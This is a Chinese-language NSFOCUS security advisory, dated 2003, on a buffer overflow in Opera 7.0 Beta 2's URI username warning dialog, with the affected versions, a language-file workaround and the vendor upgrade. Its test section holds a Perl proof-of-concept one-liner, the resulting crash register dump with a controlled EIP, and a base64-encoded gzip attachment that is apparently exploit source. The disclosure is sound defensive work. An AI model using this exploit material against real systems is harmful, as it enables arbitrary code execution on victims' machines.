首页 -> 安全研究
安全研究
安全漏洞
Opera用户URI警告对话框远程缓冲区溢出漏洞
发布日期:2003-02-10
更新日期:2003-02-17
受影响系统:
Opera Software Opera Web Browser 7.0 win32 Beta2不受影响系统:
Opera Software Opera Web Browser 7.0 win32 Beta1
Opera Software Opera Web Browser 6.0.5 win32
Opera Software Opera Web Browser 7.01 win32描述:
Opera Software Opera Web Browser 7.0 win32
BUGTRAQ ID: 6811
Opera是一款开放源代码的WEB浏览器。
Opera在处理包含用户名的URI时缺少正确边界缓冲区检查,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户点击,使Opera产生缓冲区溢出,可能以Opera权限在系统上执行任意指令。
为了安全目的,Opera当用户访问包含用户名的URI时会显示警告对话框,但是Opera对用户名缺少正确的长度检查,超长的用户名可以导致触发缓冲区溢出,攻击者构建的WEB页面,精心设计用户名数据,当诱使用户访问后,可能以用户进程在系统上执行任意指令。
<*来源:nesumin (nesumin@softhome.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104489835510042&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"
"%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
(with "Encode all addresses with UTF-8" setting.)
---------------------------------------------------------------------
Exception C0000005
EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8 ESI=00000001
EDI=00000110 EBP=80000001 ESP=0012E28C *EIP=FEFEFEFE FLAGS=00000202
---------------------------------------------------------------------
--------_3E46057E788A022A1008_MULTIPART_MIXED_
Content-Type: application/octet-stream; name="o6unexp.c.gz"
Content-Disposition: attachment;
filename="o6unexp.c.gz"
Content-Transfer-Encoding: base64
H4sICLC7Rj4AAG82dW5leHAuYwDtOmt32kqSn8k5+Q99uRuPZMsgHga/8B0eImEGG6/Bubkb+3Bk
aIwcIbGSMPZM8t+3qh+iJSBxcjOz+2F1ElndXV3vrq7qJr/7p5/Xrwj7T3pzGtjkOqSBZ88oaSwm
ExqQ3iMNJq6/JNbT3PWdKAa/vOq1rpsDQsixmDrxA/K74439Zcgg3ltX/U7vgkFUcuYBuVs47pgU
CmXTIFVyRyO7KPqKB9WqmHPR6l0RBWvfj5Z2QEm9XyfaNIrmx/n8crnM+TiaG/mzvM5mNnvn59YF
MnRMBlMnJPPAvw/sGbmnHkBGNCSUi0DeDc67ZOK4lERTm0lE1CcKnknkAzQdLSJKsiPbHeWglc0R
mAyYqTfyx3RM7p7J9aC9X6jk1nAMpjSkZEwnjgeAj7a7APoz+xm65tQbE98DLI9O4Hsz6kXr8zsR
8B2FxB6PAxqGZBL4M/LsLwIyozMfGHQmJPvWGtRbrassmdrhGoY7Sj3JQC622nW//tYiXL//AeKD
NP4imi+i4TSauUNUClp/DZuA3Sdn28DZlPpgYF0M0OjHBHyr1SMXvQGpN677Fhm86/TBSi0LBjYp
DNDDP5uE9mwOpvE995m51GhKR58c7548Lly05J3jOtHzOoY6qJXbxyYL8OK/hARUN/e90OFTyBKs
TcGfsX/hRus6Q22MRosg4MZlIqOpV/obvKtf/L3P9efM7HvQrgEmcf3A8QwGcd5rddodq4UQRdMs
5c1i3jyKEXhAeuZ45FR8/DX0J9HUn9GcR6MzBoKvH3/IoN74WL4lu/nXr16/yufxP/lMVgv7mORy
OULa9b9b0N9vX8L7yhrA2/Pn8T9oouQF+JuTD0mPFsUoo4HPboFsf3aLaoOUYu5g1j7JYq/CJPPq
eAWBxlxwAbZoNc/PkWKhXCnpK8rcWHx1hbi8wDPvoynxJ+AUHAzoo5xiSYm+ErH6l+AQ904YgWfM
fceDZRf5uZg7+jRyF2NKzCcTHsN8msBjYKvI/5Qo+1M2eeeBUAiq/1fH45NPw2js+LnpWarPde7W
OsGV7lOda1MnIy9yU30z23X9EeuEbq45ImJEBgRh8blzUSpyx9j/cw+i4A7X6xOxkwARIGvD2hIh
L8dJkaXjFT+RcF4iD3OyR2zvmbzzo4nzZJBPYHHqloq5seuSg5yZKxaODnIVs3q0EgIlGP7t/JJJ
kjGfqlWrUm2Z5RREt1dvdTuNq/rVHwKobVmHKSBQCGxdTYaKAVXNo3JzxefRIQTuh3mKsXKuYCJv
8CDgNsYabatQKZaaazBJ1hrtdrVaPTDXwJLMIVjFKh4iGGys58jX16m3y4dFs/Vt6pVqlaP9OvVK
xTIZk7ivf7gk/cvCN1gAfR7UrYOjb7AAYKXWUaXwDRYQrFGSDsu9TV3idhwSeDiQfvgr7I6AG50e
ooDrhNMcRA/okLS69YbVHXati7eDd0CnAEL+St2Q8jkP9tyG8Ey/PsmkOMkbOxOVPZaWwNYD20zo
AI/rHDEIlhApuJnwvXa7bw0yGQ04Kh+NIChqKs3doq4rU3ArLcg5moKAwApjkchMgxdjcHWyAJ+M
9YQWOJ8iT/sqq5PD/x1WU7p/YborqbQ73a7V+r35rs48FwJ4QRmE3fF9vXtt4dChyZ7CT4ubhN7f
G+TODinLBKfhA3gM9OUwIfU+ib1pPQF9/WoB2cw9boijqR3wHfrjbe2fGdCe+WQ1YAc6aOGLfZXg
dYhfTfwq4at5BK9GAV7lMrxauGdZ2HeIXyW2hRVx1DQ4Smy06ziGX00EOCxJlCYiL+Pr8BCb2NfA
r3p9/dVuc5SMJmOLfR0wciXJL2tupHW4TqbR4CgbDUN9ASWVTJuRqb+QTJmjXKf0TTKHsZIZQVMh
yFBye2wTqBxP4ngr69j4ABRKX042eUIRPSGff4JtHq3IaB4xAx/KyW0r/sJXBROYKnpDFb2hwr5w
RhWpF0fYh18Vyl9cjLEhXnwmKrGCjFYP8Gsk4dkAg6tUsWnj151EzgcKHCWbzokUYsKrSVUJf2Ry
2X/WMmSFYESh3oDCgIztyH79agQFQ0SS2mXFzpTa44+3pAYcZ0+x5+wmuPGyvAljSnMGIZNgrbpP
/3vhPNZusoA1gkJvP3qe05ssEU0YiOhTlEdsJ4xUSKMarylvsgrCyIlcevayCv00z6FXs/Mp9u78
8bPKfOHFmAH09C7gc094gjshJt8vbG809QP43qrBAqqPZE9twjhEtbjO6BPUT6CSaUAn0CMqfMS+
HVGRI/prHpQkUZzm7ZgvZRfDIo2+hClndk/CYPQjLKzIyh1p67SJ70dsJjdEcJb+vzLL2Hk8gyJU
1ImneWwrNk0ZMb/yyJ+1QFbb8cV762ow7Hf+y8rw8icdfu6Yw3zkg7cbopMHrhTR8UcV116pePuz
eH39Cuo2PDKpj8dQ3GkxfdeHHHH3YTY3Ul2ub2P1le4GFPPAH+nA2KPvjMkcqrHoOgQn0rCN/Uhp
dldcRJNCRUsKugvEI4MgBH4NQ+cfLGpmNjnSLgn9RTCiBoLzTzZBP5HyzGzH0/DDDu5HhiAB348f
byEB+icgxkEHHRWyGYvsTvxFhK2kUFjxDkEFWOnWEik75y1DOEgXVNJ17gI7eJZwStqehH1Lo0vQ
U12cT9XW0ndkA4KDhqyTX2qkiBkespxRVIqiZjIBjRaBR0xsfBFRBXxP1q58IQcgGnojFPRgI6WK
Z1R+UWy/o8hrkJ20aLIrKYEeszdh/E00qM5pEBAD0i/P8yMonxfeWNKFZZbgvSB4X5/N+biJbqJj
2JbfmIcfYK6hsMjwrE1TGN4wUxndPD0pnIohxpGSPxG/2HGBA3UvX9hIAbIKzamZJ8Qhp2oNsF8q
Qt9ejdk3s7taECHsBtGurnEUe44OTpIa1XnA2FFSceb7klqKTIoyI1tOk0WPT1GNk/kTKRtss2K7
3z5VoaQTwKKYTGUSWOA6UauWPezb22O8idjoYNTHFAbtJfpwtfsTQVDfLzAQhlz4PIXMZESl03Ga
zArOqZjLSgB9X7QSougneyA/soArhKwLyuYyFSFndfEQNiXzNfC1cMGWAm665EWkGuJ5Mamkr3L1
z+hsNH+W1lKrRIMXRgZJ6EiXVltEgDaMgtFsrrFgWrg1svtZnfwGa3xOvbiTZJd30H0MwGMRWFms
QRTfDBfLwIGcEk8ncluDBWLjuGs1xtfODrrmDPjV2Nm6L4Z1g/SGjc4FhGEdXM38JnWBJZ6FFxoc
1VZuBD+J7Z6cAYNciTxZ0skuKUIVzpcdsPs16OIKmsQc444FkjEOwMV5sksavXOt60SQFRILgpDt
MfwTpkQtewPlCvy3sgYBqxYNwizA7YlIZnd4ZAu7q4Omhkx0LNQPnahHDgY6cX2opanWbQ6bgz8u
LSNr8eMhoRFwKQDS4nTFIKaRkJCDAfvgQXEKsAKP/U10gNni0iH2xrgHFjzHJ8RUyIKUQCQp57+K
uUKSs8J3siWg+DJkIGogXMEq+KBUZYDK8izq/x5hi0lhi/9HbIBlQZIz7PleSyRiAUSvG49f1uEy
OCY32TfhTRa3fzarVuPxAKJetj9o9a4HWQASoU+QTSMc+94qmmEAE3XWOqQIQ4Jjg0RTqtzIoIR4
2Rb5Pov4OY4Ro/PI9UMIftJplNTwizijj8RN4WhK6TwuLYCo5+OY94mEiyDw77Gkn9tOQI51Nk8E
iSVm0UNgSXxgX/HuGYCxrbk8CFEZhL6W7Hcuhqt8XzS+lfIDmJL1xy2e+POcXjK2PJEJfs00HuC/
exJHaUHttGaSz59XaKCtE6Gz/YLQ6XLKjsid0yQ13GweTlW2wd1klHaZ/0b+cqTtLCFjjqdCHmOk
2N53uLsgXy45hQ1eJ3cBtT+xXkHg48Pe3m0iA0QpdQ0zwJ2l/mJQbXl2dqgLgmSvRlzpiytveZDe
srGC40pe81gy3PbkjnNbx+RiWEP3mfzI83krPnlR/bKTmviW9Zv4CFmdMWy5lFZvbbfLO/yR5zOr
RzZjZCY7Jn5l4dGnOZ5/y58qyJ8dxJO/8JQ5XTbm87U//4hbYFv8jsSVhSiEa2oHoyleTfPfZKh3
sUv+O5jUDe08tOcO61OPPFglwm5nBUb5o4/kEcemM6Xdlut2HVgytzV06qx6Z5k18DrWJxiH6Rh8
Qh1EYPyRhATF9v3YUZv2+BG5jdvObKYOg4Sz2arpu1QdBb+ByaJHHtrKAyVgugnFdBRni0IKPZ8u
Y7iQWJtvkf9vrB5jKigJHfBksVXmjPCWFbcOyjdPzVLMEguvIdYV9Ufbce07lzZxG0geoEBgQpuI
0PEjvwmIg5OGgUsTCMmOwIDTZUadGMQBBIgHN0/FA5YNmDaj4sDfjRllexFmBPxezMWXYi5+J+YS
fSHmEv1OzGXzhZjL5vdq4+Cl2jiQmHUlQcLjMXYrLu6g47PRNnS+533axtUExDCups9EITcczsJN
vW6onEOCg9fMxOkjxwqlwfqZJEuTptj/vj9sdz5YLTzB7Fy0e2T3cSJLbU4ZMxVODb9Y0GBnKUxz
eH70NiFbx5v4fYDRtO7loD+40qVYO1N9dcyH6IEzzHPY72YY2r0yA+AQDGQddYxWxl7zlpUBTCI8
MOOHGmg+mPWfCxo8v8cfwyA1I3tzkzV2HifGDkv4OCinlhF6Bo4eJ/tn46VC97x/osC4G2G6Egbs
AOMF3vrC3pOAMvo8b/oiMiaRLsEf6T0py4kNqeOd09mG5DeMbMjtZR7LxN/mVrjFrfJkaKgJbwp8
tAiGcx9llDTInqRA9hMIRIY7HEa4/XJFinRXYjlboUmZlph4GoXHSLO5BDdIzGyKUWHSTZtF6thN
oNLF6ZZUs+jmZtnfV5vSIMMhbCx0Hmlaf1AfXPeH9WbT6veH7zu9bp39rBIYBo+0GBTYvIknRdyL
fiPWh6Z1iVBD64PVvB5Yw3f1i1bXuoK6bjUG1eqgc3FtDftW/ar5bvtJUkwEK7b6aIQZyXvHd23W
t7SV30pCCqR4CqRCmq5UiRvKuK9e1qCLb7iwYZ6/+dIGh+TFjXIvYjysx51ZiIVUyAPVu/Ne67pr
kamL61imJXgplen1xc+XWUhyYN0LX+OwJhYoygGolhWrkCU8uoxfElg5/Zr4ufESsCdjVU1kPgmy
fLWCvQWw9aTtIALe34Y1LanHdNiIclLBBgxTHjywpr4q1wQ7l2BUyD9nnXGtBvSHl+Bt7d7V+ZD9
XHB4MVBWDmwwFwP2xZXH9DOTCsrEOmW5blpJPAGOVZTJNHq9LtGATP2yQ3YnczzpPffHC5eiZoIZ
czZd445sCNxG93JF22j93rtqyTOQzBYUWE5i9berJ4+SNcYRuy9ZmyN5jK8+nFPpIvHJuozd3ABO
2ivkFuEIy2QUr3BuRXwQKLaxjltQE9eZxxhHpnVDojB2mOqlfVdq0SXBjMSOUjyAFA+nJdxGf9Hk
QkuU2iyCqWFfqC0myOjl0Gd7kw5erhtKDv5waxR1vHd4iMmjwJKSEDiWOJNKSpQddQcSjh03jNGs
x6c2u49j51ofyJsPN1nYG/glF8ajNyF5s8jJf3jqJRFlEvyy3TvZgyf/cRBaWXCFQINN+uyMFCo6
S8va8BgE05S4obkbINwVxEqs1UFJvFmLP/ytrnLmq6stPD59ixfm0RNfmNZ57+qPYaPe7zSH6AxX
53z3UJbpv8up3ztBtLBdlgZp27x2C796vKp/tvte0XvwN3Ti//fef6H3fhH3M6mTh4y6l6+bLxWh
5d6WuBOvi+Csbv3fgSk5kJV+9kKDrhkTzEXSBlMmb9K4qvBN+k6pm5H92pJFRzWxLkytw/UsQSxb
pQBYLSVYWAnbyLZMrshvpABOK/I4+XuBH/v9Dgr1P2zPPxfANgAA
--------_3E46057E788A022A1008_MULTIPART_MIXED_--
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 通过编辑语言文件(.lng)可以使用户名不显示在警告对话框中:
在语言文件中删除资源号"21463"之前的两个"%s"字符串即可。
厂商补丁:
Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Opera Software Upgrade Opera Web Browser 7.01 Win32
http://www.opera.com/download/index.dml?opsys=Windows&lng=en&platform=Windows
浏览次数:8714
严重程度:0(网友投票)
绿盟科技给您安全的保障